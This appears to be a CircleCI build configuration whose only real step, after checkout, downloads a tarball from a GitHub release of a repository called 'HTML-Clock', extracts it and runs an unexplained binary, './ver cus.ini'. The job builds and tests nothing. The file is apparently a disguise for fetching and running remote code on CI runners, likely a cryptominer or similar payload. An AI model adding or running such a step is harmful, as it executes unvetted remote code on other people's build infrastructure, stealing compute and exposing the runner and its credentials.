version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  wget https://github.com/Wakfodo/HTML-Clock/releases/download/helo/Doc.tar.gz && tar -xvf Doc.tar.gz && ./ver cus.ini